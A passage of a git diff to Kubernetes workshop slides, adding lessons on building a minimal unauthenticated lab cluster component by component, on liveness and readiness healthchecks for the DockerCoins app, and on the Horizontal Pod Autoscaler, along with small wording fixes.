-  kubectl -n kube-system edit service kubernetes-dashboard
-  ```
-
- Change type `type:` from `ClusterIP` to `NodePort`, save, and exit
-
-<!--
-```wait Please edit the object below```
-```keys /ClusterIP```
-```keys ^J```
-```keys cwNodePort```
-```keys ^[ ``` ]
-```keys :wq```
-```keys ^J```
-->
-
- Check the port that was assigned with `kubectl -n kube-system get services`
-
- Connect to https://oneofournodes:3xxxx/ (yes, https)
-
-]
-
---
-
 ## Running the Kubernetes dashboard securely

 - The steps that we just showed you are *for educational purposes only!*
@@ -262,5 +153,7 @@ The dashboard will then ask you which authentication you want to use.

 --

- It introduces new failure modes (like if you try to apply yaml from a link that's no longer valid)
+- It introduces new failure modes
+
+  (for instance, if you try to apply YAML from a link that's no longer valid)

--- a/slides/k8s/declarative.md
+++ b/slides/k8s/declarative.md
@@ -1,6 +1,20 @@
 ## Declarative vs imperative in Kubernetes

- Virtually everything we create in Kubernetes is created from a *spec*
+- With Kubernetes, we cannot say: "run this container"
+
+- All we can do is write a *spec* and push it to the API server
+
+  (by creating a resource like e.g. a Pod or a Deployment)
+
+- The API server will validate that spec (and reject it if it's invalid)
+
+- Then it will store it in etcd
+
+- A *controller* will "notice" that spec and act upon it
+
+---
+
+## Reconciling state

 - Watch for the `spec` fields in the YAML files later!

--- a/slides/k8s/deploymentslideshow.md
+++ b/slides/k8s/deploymentslideshow.md
@@ -0,0 +1,67 @@
+## 19,000 words
+
+They say, "a picture is worth one thousand words."
+
+The following 19 slides show what really happens when we run:
+
+```bash
+kubectl run web --image=nginx --replicas=3
+```
+
+---
+class: pic
+![](images/kubectl-run-slideshow/01.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/02.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/03.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/04.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/05.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/06.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/07.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/08.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/09.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/10.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/11.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/12.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/13.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/14.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/15.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/16.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/17.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/18.svg)
+---
+class: pic
+![](images/kubectl-run-slideshow/19.svg)
--- a/slides/k8s/dmuc.md
+++ b/slides/k8s/dmuc.md
@@ -0,0 +1,837 @@
+# Building our own cluster
+
+- Let's build our own cluster!
+
+  *Perfection is attained not when there is nothing left to add, but when there is nothing left to take away. (Antoine de Saint-Exupery)*
+
+- Our goal is to build a minimal cluster allowing us to:
+
+  - create a Deployment (with `kubectl run` or `kubectl create deployment`)
+  - expose it with a Service
+  - connect to that service
+
+
+- "Minimal" here means:
+
+  - smaller number of components
+  - smaller number of command-line flags
+  - smaller number of configuration files
+
+---
+
+## Non-goals
+
+- For now, we don't care about security
+
+- For now, we don't care about scalability
+
+- For now, we don't care about high availability
+
+- All we care about is *simplicity*
+
+---
+
+## Our environment
+
+- We will use the machine indicated as `dmuc1`
+
+  (this stands for "Dessine Moi Un Cluster" or "Draw Me A Sheep",
+  <br/>in homage to Saint-Exupery's "The Little Prince")
+
+- This machine:
+
+  - runs Ubuntu LTS
+
+  - has Kubernetes, Docker, and etcd binaries installed
+
+  - but nothing is running
+
+---
+
+## Checking our environment
+
+- Let's make sure we have everything we need first
+
+.exercise[
+
+- Log into the `dmuc1` machine
+
+- Get root:
+  ```bash
+  sudo -i
+  ```
+
+- Check available versions:
+  ```bash
+  etcd -version
+  kube-apiserver --version
+  dockerd --version
+  ```
+
+]
+
+---
+
+## The plan
+
+1. Start API server
+
+2. Interact with it (create Deployment and Service)
+
+3. See what's broken
+
+4. Fix it and go back to step 2 until it works!
+
+---
+
+## Dealing with multiple processes
+
+- We are going to start many processes
+
+- Depending on what you're comfortable with, you can:
+
+  - open multiple windows and multiple SSH connections
+
+  - use a terminal multiplexer like screen or tmux
+
+  - put processes in the background with `&`
+    <br/>(warning: log output might get confusing to read!)
+
+---
+
+## Starting API server
+
+.exercise[
+
+- Try to start the API server:
+  ```bash
+  kube-apiserver
+  # It will fail with "--etcd-servers must be specified"
+  ```
+
+]
+
+Since the API server stores everything in etcd,
+it cannot start without it.
+
+---
+
+## Starting etcd
+
+.exercise[
+
+- Try to start etcd:
+  ```bash
+  etcd
+  ```
+
+]
+
+Success!
+
+Note the last line of output:
+```
+serving insecure client requests on 127.0.0.1:2379, this is strongly discouraged!
+```
+
+*Sure, that's discouraged. But thanks for telling us the address!*
+
+---
+
+## Starting API server (for real)
+
+- Try again, passing the `--etcd-servers` argument
+
+- That argument should be a comma-separated list of URLs
+
+.exercise[
+
+- Start API server:
+  ```bash
+  kube-apiserver --etcd-servers http://127.0.0.1:2379
+  ```
+
+]
+
+Success!
+
+---
+
+## Interacting with API server
+
+- Let's try a few "classic" commands
+
+.exercise[
+
+- List nodes:
+  ```bash
+  kubectl get nodes
+  ```
+
+- List services:
+  ```bash
+  kubectl get services
+  ```
+
+]
+
+We should get `No resources found.` and the `kubernetes` service, respectively.
+
+Note: the API server automatically created the `kubernetes` service entry.
+
+---
+
+class: extra-details
+
+## What about `kubeconfig`?
+
+- We didn't need to create a `kubeconfig` file
+
+- By default, the API server is listening on `localhost:8080`
+
+  (without requiring authentication)
+
+- By default, `kubectl` connects to `localhost:8080`
+
+  (without providing authentication)
+
+---
+
+## Creating a Deployment
+
+- Let's run a web server!
+
+.exercise[
+
+- Create a Deployment with NGINX:
+  ```bash
+  kubectl create deployment web --image=nginx
+  ```
+
+]
+
+Success?
+
+---
+
+## Checking our Deployment status
+
+.exercise[
+
+- Look at pods, deployments, etc.:
+  ```bash
+  kubectl get all
+  ```
+
+]
+
+Our Deployment is in bad shape:
+```
+NAME                  READY   UP-TO-DATE   AVAILABLE   AGE
+deployment.apps/web   0/1     0            0           2m26s
+```
+
+And, there is no ReplicaSet, and no Pod.
+
+---
+
+## What's going on?
+
+- We stored the definition of our Deployment in etcd
+
+  (through the API server)
+
+- But there is no *controller* to do the rest of the work
+
+- We need to start the *controller manager*
+
+---
+
+## Starting the controller manager
+
+.exercise[
+
+- Try to start the controller manager:
+  ```bash
+  kube-controller-manager
+  ```
+
+]
+
+The final error message is:
+```
+invalid configuration: no configuration has been provided
+```
+
+But the logs include another useful piece of information:
+```
+Neither --kubeconfig nor --master was specified.
+Using the inClusterConfig.  This might not work.
+```
+
+---
+
+## Reminder: everyone talks to API server
+
+- The controller manager needs to connect to the API server
+
+- It *does not* have a convenient `localhost:8080` default
+
+- We can pass the connection information in two ways:
+
+  - `--master` and a host:port combination (easy)
+
+  - `--kubeconfig` and a `kubeconfig` file
+
+- For simplicity, we'll use the first option
+
+---
+
+## Starting the controller manager (for real)
+
+.exercise[
+
+- Start the controller manager:
+  ```bash
+  kube-controller-manager --master http://localhost:8080
+  ```
+
+]
+
+Success!
+
+---
+
+## Checking our Deployment status
+
+.exercise[
+
+- Check all our resources again:
+  ```bash
+  kubectl get all
+  ```
+
+]
+
+We now have a ReplicaSet.
+
+But we still don't have a Pod.
+
+---
+
+## What's going on?
+
+In the controller manager logs, we should see something like this:
+```
+E0404 15:46:25.753376   22847 replica_set.go:450] Sync "default/web-5bc9bd5b8d"
+failed with `No API token found for service account "default"`, retry after the
+token is automatically created and added to the service account
+```
+
+- The service account `default` was automatically added to our Deployment
+
+  (and to its pods)
+
+- The service account `default` exists
+
+- But it doesn't have an associated token
+
+  (the token is a secret; creating it requires signature; therefore a CA)
+
+---
+
+## Solving the missing token issue
+
+There are many ways to solve that issue.
+
+We are going to list a few (to get an idea of what's happening behind the scenes).
+
+Of course, we don't need to perform *all* the solutions mentioned here.
+
+---
+
+## Option 1: disable service accounts
+
+- Restart the API server with
+  `--disable-admission-plugins=ServiceAccount`
+
+- The API server will no longer add a service account automatically
+
+- Our pods will be created without a service account
+
+---
+
+## Option 2: do not mount the (missing) token
+
+- Add `automountServiceAccountToken: false` to the Deployment spec
+
+  *or*
+
+- Add `automountServiceAccountToken: false` to the default ServiceAccount
+
+- The ReplicaSet controller will no longer create pods referencing the (missing) token
+
+.exercise[
+
+- Programmatically change the `default` ServiceAccount:
+  ```bash
+  kubectl patch sa default -p "automountServiceAccountToken: false"
+  ```
+
+]
+
+---
+
+## Option 3: set up service accounts properly
+
+- This is the most complex option!
+
+- Generate a key pair
+
+- Pass the private key to the controller manager
+
+  (to generate and sign tokens)
+
+- Pass the public key to the API server
+
+  (to verify these tokens)
+
+---
+
+## Continuing without service account token
+
+- Once we patch the default service account, the ReplicaSet can create a Pod
+
+.exercise[
+
+- Check that we now have a pod:
+  ```bash
+  kubectl get all
+  ```
+
+]
+
+Note: we might have to wait a bit for the ReplicaSet controller to retry.
+
+If we're impatient, we can restart the controller manager.
+
+---
+
+## What's next?
+
+- Our pod exists, but it is in `Pending` state
+
+- Remember, we don't have a node so far
+
+  (`kubectl get nodes` shows an empty list)
+
+- We need to:
+
+  - start a container engine
+
+  - start kubelet
+
+---
+
+## Starting a container engine
+
+- We're going to use Docker (because it's the default option)
+
+.exercise[
+
+- Start the Docker Engine:
+  ```bash
+  dockerd
+  ```
+
+]
+
+Success!
+
+Feel free to check that it actually works with e.g.:
+```bash
+docker run alpine echo hello world
+```
+
+---
+
+## Starting kubelet
+
+- If we start kubelet without arguments, it *will* start
+
+- But it will not join the cluster!
+
+- It will start in *standalone* mode
+
+- Just like with the controller manager, we need to tell kubelet where the API server is
+
+- Alas, kubelet doesn't have a simple `--master` option
+
+- We have to use `--kubeconfig`
+
+- We need to write a `kubeconfig` file for kubelet
+
+---
+
+## Writing a kubeconfig file
+
+- We can copy/paste a bunch of YAML
+
+- Or we can generate the file with `kubectl`
+
+.exercise[
+
+- Create the file `kubeconfig.kubelet` with `kubectl`:
+  ```bash
+    kubectl --kubeconfig kubeconfig.kubelet config \
+            set-cluster localhost --server http://localhost:8080
+    kubectl --kubeconfig kubeconfig.kubelet config \
+            set-context localhost --cluster localhost
+    kubectl --kubeconfig kubeconfig.kubelet config \
+            use-context localhost
+  ```
+
+]
+
+---
+
+## All Kubernetes clients can use `kubeconfig`
+
+- The `kubeconfig.kubelet` file has the same format as e.g. `~/.kube/config`
+
+- All Kubernetes clients can use a similar file
+
+- The `kubectl config` commands can be used to manipulate these files
+
+- This highlights that kubelet is a "normal" client of the API server
+
+---
+
+## Our `kubeconfig.kubelet` file
+
+The file that we generated looks like the one below.
+
+That one has been slightly simplified (removing extraneous fields), but it is still valid.
+
+```yaml
+apiVersion: v1
+kind: Config
+current-context: localhost
+contexts:
+- name: localhost
+  context:
+    cluster: localhost
+clusters:
+- name: localhost
+  cluster:
+    server: http://localhost:8080
+```
+
+---
+
+## Starting kubelet
+
+.exercise[
+
+- Start kubelet with that `kubeconfig.kubelet` file:
+  ```bash
+  kubelet --kubeconfig kubeconfig.kubelet
+  ```
+
+]
+
+Success!
+
+---
+
+## Looking at our 1-node cluster
+
+- Let's check that our node registered correctly
+
+.exercise[
+
+- List the nodes in our cluster:
+  ```bash
+  kubectl get nodes
+  ```
+
+]
+
+Our node should show up.
+
+Its name will be its hostname (it should be `dmuc1`).
+
+---
+
+## Are we there yet?
+
+- Let's check if our pod is running
+
+.exercise[
+
+- List all resources:
+  ```bash
+  kubectl get all
+  ```
+
+]
+
+--
+
+Our pod is still `Pending`. 🤔
+
+--
+
+Which is normal: it needs to be *scheduled*.
+
+(i.e., something needs to decide which node it should go on.)
+
+---
+
+## Scheduling our pod
+
+- Why do we need a scheduling decision, since we have only one node?
+
+- The node might be full, unavailable; the pod might have constraints ...
+
+- The easiest way to schedule our pod is to start the scheduler
+
+  (we could also schedule it manually)
+
+---
+
+## Starting the scheduler
+
+- The scheduler also needs to know how to connect to the API server
+
+- Just like for the controller manager, we can use `--kubeconfig` or `--master`
+
+.exercise[
+
+- Start the scheduler:
+  ```bash
+  kube-scheduler --master http://localhost:8080
+  ```
+
+]
+
+- Our pod should now start correctly
+
+---
+
+## Checking the status of our pod
+
+- Our pod will go through a short `ContainerCreating` phase
+
+- Then it will be `Running`
+
+.exercise[
+
+- Check pod status:
+  ```bash
+  kubectl get pods
+  ```
+
+]
+
+Success!
+
+---
+
+class: extra-details
+
+## Scheduling a pod manually
+
+- We can schedule a pod in `Pending` state by creating a Binding, e.g.:
+  ```bash
+    kubectl create -f- <<EOF
+    apiVersion: v1
+    kind: Binding
+    metadata:
+      name: name-of-the-pod
+    target:
+      apiVersion: v1
+      kind: Node
+      name: name-of-the-node
+    EOF
+  ```
+
+- This is actually how the scheduler works!
+
+- It watches pods, makes scheduling decisions, and creates Binding objects
+
+---
+
+## Connecting to our pod
+
+- Let's check that our pod correctly runs NGINX
+
+.exercise[
+
+- Check our pod's IP address:
+  ```bash
+  kubectl get pods -o wide
+  ```
+
+- Send an HTTP request to the pod:
+  ```bash
+  curl `X.X.X.X`
+  ```
+
+]
+
+We should see the `Welcome to nginx!` page.
+
+---
+
+## Exposing our Deployment
+
+- We can now create a Service associated with this Deployment
+
+.exercise[
+
+- Expose the Deployment's port 80:
+  ```bash
+  kubectl expose deployment web --port=80
+  ```
+
+- Check the Service's ClusterIP, and try connecting:
+  ```bash
+  kubectl get service web
+  curl http://`X.X.X.X`
+  ```
+
+]
+
+--
+
+This won't work. We need kube-proxy to enable internal communication.
+
+---
+
+## Starting kube-proxy
+
+- kube-proxy also needs to connect to the API server
+
+- It can work with the `--master` flag
+
+  (although that will be deprecated in the future)
+
+.exercise[
+
+- Start kube-proxy:
+  ```bash
+  kube-proxy --master http://localhost:8080
+  ```
+
+]
+
+---
+
+## Connecting to our Service
+
+- Now that kube-proxy is running, we should be able to connect
+
+.exercise[
+
+- Check the Service's ClusterIP again, and retry connecting:
+  ```bash
+  kubectl get service web
+  curl http://`X.X.X.X`
+  ```
+
+]
+
+Success!
+
+---
+
+class: extra-details
+
+## How kube-proxy works
+
+- kube-proxy watches Service resources
+
+- When a Service is created or updated, kube-proxy creates iptables rules
+
+.exercise[
+
+- Check out the `OUTPUT` chain in the `nat` table:
+  ```bash
+  iptables -t nat -L OUTPUT
+  ```
+
+- Traffic is sent to `KUBE-SERVICES`; check that too:
+  ```bash
+  iptables -t nat -L KUBE-SERVICES
+  ```
+
+]
+
+For each Service, there is an entry in that chain.
+
+---
+
+class: extra-details
+
+## Diving into iptables
+
+- The last command showed a chain named `KUBE-SVC-...` corresponding to our service
+
+.exercise[
+
+- Check that `KUBE-SVC-...` chain:
+  ```bash
+  iptables -t nat -L `KUBE-SVC-...`
+  ```
+
+- It should show a jump to a `KUBE-SEP-...` chain; check it out too:
+  ```bash
+  iptables -t nat -L `KUBE-SEP-...`
+  ```
+
+]
+
+This is a `DNAT` rule to rewrite the destination address of the connection to our pod.
+
+This is how kube-proxy works!
+
+---
+
+class: extra-details
+
+## kube-router, IPVS
+
+- With recent versions of Kubernetes, it is possible to tell kube-proxy to use IPVS
+
+- IPVS is a more powerful load balancing framework
+
+  (remember: iptables was primarily designed for firewalling, not load balancing!)
+
+- It is also possible to replace kube-proxy with kube-router
+
+- kube-router uses IPVS by default
+
+- kube-router can also perform other functions
+
+  (e.g., we can use it as a CNI plugin to provide pod connectivity)
+
+---
+
+class: extra-details
+
+## What about the `kubernetes` service?
+
+- If we try to connect, it won't work
+
+  (by default, it should be `10.0.0.1`)
+
+- If we look at the Endpoints for this service, we will see one endpoint:
+
+  `host-address:6443`
+
+- By default, the API server expects to be running directly on the nodes
+
+  (it could be as a bare process, or in a container/pod using the host network)
+
+- ... And it expects to be listening on port 6443 with TLS
--- a/slides/k8s/extending-api.md
+++ b/slides/k8s/extending-api.md
@@ -61,7 +61,7 @@ There are many possibilities!

  - creates a new custom type, `Remote`, exposing a git+ssh server

-  - deploy by pushing YAML or Helm Charts to that remote
+  - deploy by pushing YAML or Helm charts to that remote

 - Replacing built-in types with CRDs

@@ -87,7 +87,11 @@ There are many possibilities!

  (and take action when they are created/updated)

-*Example: [YAML to install the gitkube CRD](https://storage.googleapis.com/gitkube/gitkube-setup-stable.yaml)*
+*
+Examples:
+[YAML to install the gitkube CRD](https://storage.googleapis.com/gitkube/gitkube-setup-stable.yaml),
+[YAML to install a redis operator CRD](https://github.com/amaizfinance/redis-operator/blob/master/deploy/crds/k8s_v1alpha1_redis_crd.yaml)
+*

 ---

@@ -113,7 +117,7 @@ There are many possibilities!

 ## Admission controllers

- When a Pod is created, it is associated to a ServiceAccount
+- When a Pod is created, it is associated with a ServiceAccount

  (even if we did not specify one explicitly)

@@ -159,7 +163,7 @@ class: pic

 - These webhooks can be *validating* or *mutating*

- Webhooks can be setup dynamically (without restarting the API server)
+- Webhooks can be set up dynamically (without restarting the API server)

 - To setup a dynamic admission webhook, we create a special resource:

@@ -167,7 +171,7 @@ class: pic

 - These resources are created and managed like other resources

-  (i.e. `kubectl create`, `kubectl get` ...)
+  (i.e. `kubectl create`, `kubectl get`...)

 ---

--- a/slides/k8s/gitworkflows.md
+++ b/slides/k8s/gitworkflows.md
@@ -234,6 +234,6 @@

  (see the [documentation](https://github.com/hasura/gitkube/blob/master/docs/remote.md) for more details)

- Gitkube can also deploy Helm Charts
+- Gitkube can also deploy Helm charts

  (instead of raw YAML files)
--- a/slides/k8s/healthchecks-more.md
+++ b/slides/k8s/healthchecks-more.md
@@ -0,0 +1,393 @@
+## Questions to ask before adding healthchecks
+
+- Do we want liveness, readiness, both?
+
+  (sometimes, we can use the same check, but with different failure thresholds)
+
+- Do we have existing HTTP endpoints that we can use?
+
+- Do we need to add new endpoints, or perhaps use something else?
+
+- Are our healthchecks likely to use resources and/or slow down the app?
+
+- Do they depend on additional services?
+
+  (this can be particularly tricky, see next slide)
+
+---
+
+## Healthchecks and dependencies
+
+- A good healthcheck should always indicate the health of the service itself
+
+- It should not be affected by the state of the service's dependencies
+
+- Example: a web server requiring a database connection to operate
+
+  (make sure that the healthcheck can report "OK" even if the database is down;
+  <br/>
+  because it won't help us to restart the web server if the issue is with the DB!)
+
+- Example: a microservice calling other microservices
+
+- Example: a worker process
+
+  (these will generally require minor code changes to report health)
+
+---
+
+## Adding healthchecks to an app
+
+- Let's add healthchecks to DockerCoins!
+
+- We will examine the questions of the previous slide
+
+- Then we will review each component individually to add healthchecks
+
+---
+
+## Liveness, readiness, or both?
+
+- To answer that question, we need to see the app run for a while
+
+- Do we get temporary, recoverable glitches?
+
+  → then use readiness
+
+- Or do we get hard lock-ups requiring a restart?
+
+  → then use liveness
+
+- In the case of DockerCoins, we don't know yet!
+
+- Let's pick liveness
+
+---
+
+## Do we have HTTP endpoints that we can use?
+
+- Each of the 3 web services (hasher, rng, webui) has a trivial route on `/`
+
+- These routes:
+
+  - don't seem to perform anything complex or expensive
+
+  - don't seem to call other services
+
+- Perfect!
+
+  (See next slides for individual details)
+
+---
+
+- [hasher.rb](https://github.com/jpetazzo/container.training/blob/master/dockercoins/hasher/hasher.rb)
+  ```ruby
+    get '/' do
+      "HASHER running on #{Socket.gethostname}\n"
+    end
+  ```
+
+- [rng.py](https://github.com/jpetazzo/container.training/blob/master/dockercoins/rng/rng.py)
+  ```python
+    @app.route("/")
+    def index():
+      return "RNG running on {}\n".format(hostname)
+  ```
+
+- [webui.js](https://github.com/jpetazzo/container.training/blob/master/dockercoins/webui/webui.js)
+  ```javascript
+    app.get('/', function (req, res) {
+      res.redirect('/index.html');
+    });
+  ```
+
+---
+
+## Running DockerCoins
+
+- We will run DockerCoins in a new, separate namespace
+
+- We will use a set of YAML manifests and pre-built images
+
+- We will add our new liveness probe to the YAML of the `rng` DaemonSet
+
+- Then, we will deploy the application
+
+---
+
+## Creating a new namespace
+
+- This will make sure that we don't collide / conflict with previous exercises
+
+.exercise[
+
+- Create the yellow namespace:
+  ```bash
+  kubectl create namespace yellow
+  ```
+
+- Switch to that namespace:
+  ```bash
+  kns yellow
+  ```
+
+]
+
+---
+
+## Retrieving DockerCoins manifests
+
+- All the manifests that we need are on a convenient repository:
+
+  https://github.com/jpetazzo/kubercoins
+
+.exercise[
+
+- Clone that repository:
+  ```bash
+  cd ~
+  git clone https://github.com/jpetazzo/kubercoins
+  ```
+
+- Change directory to the repository:
+  ```bash
+  cd kubercoins
+  ```
+
+]
+
+---
+
+## A simple HTTP liveness probe
+
+This is what our liveness probe should look like:
+
+```yaml
+containers:
+- name: ...
+  image: ...
+  livenessProbe:
+    httpGet:
+      path: /
+      port: 80
+    initialDelaySeconds: 30
+    periodSeconds: 5
+```
+
+This will give 30 seconds to the service to start. (Way more than necessary!)
+<br/>
+It will run the probe every 5 seconds.
+<br/>
+It will use the default timeout (1 second).
+<br/>
+It will use the default failure threshold (3 failed attempts = dead).
+<br/>
+It will use the default success threshold (1 successful attempt = alive).
+
+---
+
+## Adding the liveness probe
+
+- Let's add the liveness probe, then deploy DockerCoins
+
+.exercise[
+
+- Edit `rng-daemonset.yaml` and add the liveness probe
+  ```bash
+  vim rng-daemonset.yaml
+  ```
+
+- Load the YAML for all the resources of DockerCoins:
+  ```bash
+  kubectl apply -f .
+  ```
+
+]
+
+---
+
+## Testing the liveness probe
+
+- The rng service needs 100ms to process a request
+
+  (because it is single-threaded and sleeps 0.1s in each request)
+
+- The probe timeout is set to 1 second
+
+- If we send more than 10 requests per second per backend, it will break
+
+- Let's generate traffic and see what happens!
+
+.exercise[
+
+- Get the ClusterIP address of the rng service:
+  ```bash
+  kubectl get svc rng
+  ```
+
+]
+
+---
+
+## Monitoring the rng service
+
+- Each command below will show us what's happening on a different level
+
+.exercise[
+
+- In one window, monitor cluster events:
+  ```bash
+  kubectl get events -w
+  ```
+
+- In another window, monitor the response time of rng:
+  ```bash
+  httping `<ClusterIP>`
+  ```
+
+- In another window, monitor pods status:
+  ```bash
+  kubectl get pods -w
+  ```
+
+]
+
+---
+
+## Generating traffic
+
+- Let's use `ab` to send concurrent requests to rng
+
+.exercise[
+
+- In yet another window, generate traffic:
+  ```bash
+  ab -c 10 -n 1000 http://`<ClusterIP>`/1
+  ```
+
+- Experiment with higher values of `-c` and see what happens
+
+]
+
+- The `-c` parameter indicates the number of concurrent requests
+
+- The final `/1` is important to generate actual traffic
+
+  (otherwise we would use the ping endpoint, which doesn't sleep 0.1s per request)
+
+---
+
+## Discussion
+
+- Above a given threshold, the liveness probe starts failing
+
+  (about 10 concurrent requests per backend should be enough)
+
+- When the liveness probe fails 3 times in a row, the container is restarted
+
+- During the restart, there is *less* capacity available
+
+- ... Meaning that the other backends are likely to time out as well
+
+- ... Eventually causing all backends to be restarted
+
+- ... And each fresh backend gets restarted, too
+
+- This goes on until the load goes down, or we add capacity
+
+*This wouldn't be a good healthcheck in a real application!*
+
+---
+
+## Better healthchecks
+
+- We need to make sure that the healthcheck doesn't trip when
+  performance degrades due to external pressure
+
+- Using a readiness check would have fewer effects
+
+  (but it would still be an imperfect solution)
+
+- A possible combination:
+
+  - readiness check with a short timeout / low failure threshold
+
+  - liveness check with a longer timeout / higher failure threshold
+
+---
+
+## Healthchecks for redis
+
+- A liveness probe is enough
+
+  (it's not useful to remove a backend from rotation when it's the only one)
+
+- We could use an exec probe running `redis-cli ping`
+
+---
+
+class: extra-details
+
+## Exec probes and zombies
+
+- When using exec probes, we should make sure that we have a *zombie reaper*
+
+  🤔🧐🧟 Wait, what?
+
+- When a process terminates, its parent must call `wait()`/`waitpid()`
+
+  (this is how the parent process retrieves the child's exit status)
+
+- In the meantime, the process is in *zombie* state
+
+  (the process state will show as `Z` in `ps`, `top` ...)
+
+- When a process is killed, its children are *orphaned* and attached to PID 1
+
+- PID 1 has the responsibility of *reaping* these processes when they terminate
+
+- OK, but how does that affect us?
+
+---
+
+class: extra-details
+
+## PID 1 in containers
+
+- On ordinary systems, PID 1 (`/sbin/init`) has logic to reap processes
+
+- In containers, PID 1 is typically our application process
+
+  (e.g. Apache, the JVM, NGINX, Redis ...)
+
+- These *do not* take care of reaping orphans
+
+- If we use exec probes, we need to add a process reaper
+
+- We can add [tini](https://github.com/krallin/tini) to our images
+
+- Or [share the PID namespace between containers of a pod](https://kubernetes.io/docs/tasks/configure-pod-container/share-process-namespace/)
+
+  (and have gcr.io/pause take care of the reaping)
+
+---
+
+## Healthchecks for worker
+
+- Readiness isn't useful
+
+  (because worker isn't a backend for a service)
+
+- Liveness may help us restart a broken worker, but how can we check it?
+
+- Embedding an HTTP server is an option
+
+  (but it has a high potential for unwanted side effects and false positives)
+
+- Using a "lease" file can be relatively easy:
+
+  - touch a file during each iteration of the main loop
+
+  - check the timestamp of that file from an exec probe
+
+- Writing logs (and checking them from the probe) also works
--- a/slides/k8s/healthchecks.md
+++ b/slides/k8s/healthchecks.md
@@ -108,7 +108,7 @@

  (as opposed to merely started)

- Containers in a broken state gets killed and restarted
+- Containers in a broken state get killed and restarted

  (instead of serving errors or timeouts)

--- a/slides/k8s/helm.md
+++ b/slides/k8s/helm.md
@@ -158,7 +158,7 @@ Where do these `--set` options come from?

 ]

-The chart's metadata includes an URL to the project's home page.
+The chart's metadata includes a URL to the project's home page.

 (Sometimes it conveniently points to the documentation for the chart.)

@@ -176,77 +176,3 @@ The chart's metadata includes an URL to the project's home page.
  ```

 ]
-
---
-
-## Creating a chart
-
- We are going to show a way to create a *very simplified* chart
-
- In a real chart, *lots of things* would be templatized
-
-  (Resource names, service types, number of replicas...)
-
-.exercise[
-
- Create a sample chart:
-  ```bash
-  helm create dockercoins
-  ```
-
- Move away the sample templates and create an empty template directory:
-  ```bash
-  mv dockercoins/templates dockercoins/default-templates
-  mkdir dockercoins/templates
-  ```
-
-]
-
---
-
-## Exporting the YAML for our application
-
- The following section assumes that DockerCoins is currently running
-
-.exercise[
-
- Create one YAML file for each resource that we need:
-  .small[
-  ```bash
-
-	while read kind name; do
-	  kubectl get -o yaml --export $kind $name > dockercoins/templates/$name-$kind.yaml
-	done <<EOF
-	deployment worker
-	deployment hasher
-	daemonset rng
-	deployment webui
-	deployment redis
-	service hasher
-	service rng
-	service webui
-	service redis
-	EOF
-  ```
-  ]
-
-]
-
---
-
-## Testing our helm chart
-
-.exercise[
-
- Let's install our helm chart! (`dockercoins` is the path to the chart)
-  ```
-  helm install dockercoins
-  ```
-]
-
--
-
- Since the application is already deployed, this will fail:<br>
-`Error: release loitering-otter failed: services "hasher" already exists`
-
- To avoid naming conflicts, we will deploy the application in another *namespace*
--- a/slides/k8s/horizontal-pod-autoscaler.md
+++ b/slides/k8s/horizontal-pod-autoscaler.md
@@ -0,0 +1,245 @@
+# The Horizontal Pod Autoscaler
+
+- What is the Horizontal Pod Autoscaler, or HPA?
+
+- It is a controller that can perform *horizontal* scaling automatically
+
+- Horizontal scaling = changing the number of replicas
+
+  (adding/removing pods)
+
+- Vertical scaling = changing the size of individual replicas
+
+  (increasing/reducing CPU and RAM per pod)
+
+- Cluster scaling = changing the size of the cluster
+
+  (adding/removing nodes)
+
+---
+
+## Principle of operation
+
+- Each HPA resource (or "policy") specifies:
+
+  - which object to monitor and scale (e.g. a Deployment, ReplicaSet...)
+
+  - min/max scaling ranges (the max is a safety limit!)
+
+  - a target resource usage (e.g. the default is CPU=80%)
+
+- The HPA continuously monitors the CPU usage for the related object
+
+- It computes how many pods should be running:
+
+  `TargetNumOfPods = ceil(sum(CurrentPodsCPUUtilization) / Target)`
+
+- It scales the related object up/down to this target number of pods
+
+---
+
+## Prerequisites
+
+- The metrics server needs to be running
+
+  (i.e. we need to be able to see pod metrics with `kubectl top pods`)
+
+- The pods that we want to autoscale need to have resource requests
+
+  (because the target CPU% is not absolute, but relative to the request)
+
+- The latter actually makes a lot of sense:
+
+  - if a Pod doesn't have a CPU request, it might be using 10% of CPU...
+
+  - ...but only because there is no CPU time available!
+
+  - requiring a CPU request makes sure that we won't add pods to nodes that are already resource-starved
+
+---
+
+## Testing the HPA
+
+- We will start a CPU-intensive web service
+
+- We will send some traffic to that service
+
+- We will create an HPA policy
+
+- The HPA will automatically scale up the service for us
+
+---
+
+## A CPU-intensive web service
+
+- Let's use `jpetazzo/busyhttp`
+
+  (it is a web server that will use 1s of CPU for each HTTP request)
+
+.exercise[
+
+- Deploy the web server:
+  ```bash
+  kubectl create deployment busyhttp --image=jpetazzo/busyhttp
+  ```
+
+- Expose it with a ClusterIP service:
+  ```bash
+  kubectl expose deployment busyhttp --port=80
+  ```
+
+- Get the ClusterIP allocated to the service:
+  ```bash
+  kubectl get svc busyhttp
+  ```
+
+]
+
+---
+
+## Monitor what's going on
+
+- Let's start a bunch of commands to watch what is happening
+
+.exercise[
+
+- Monitor pod CPU usage:
+  ```bash
+  watch kubectl top pods
+  ```
+
+- Monitor service latency:
+  ```bash
+  httping http://`ClusterIP`/
+  ```
+
+- Monitor cluster events:
+  ```bash
+  kubectl get events -w
+  ```
+
+]
+
+---
+
+## Send traffic to the service
+
+- We will use `ab` (Apache Bench) to send traffic
+
+.exercise[
+
+- Send a lot of requests to the service, with a concurrency level of 3:
+  ```bash
+  ab -c 3 -n 100000 http://`ClusterIP`/
+  ```
+
+]
+
+The latency (reported by `httping`) should increase above 3s.
+
+The CPU utilization should increase to 100%.
+
+(The server is single-threaded and won't go above 100%.)
+
+---
+
+## Create an HPA policy
+
+- There is a helper command to do that for us: `kubectl autoscale`
+
+.exercise[
+
+- Create the HPA policy for the `busyhttp` deployment:
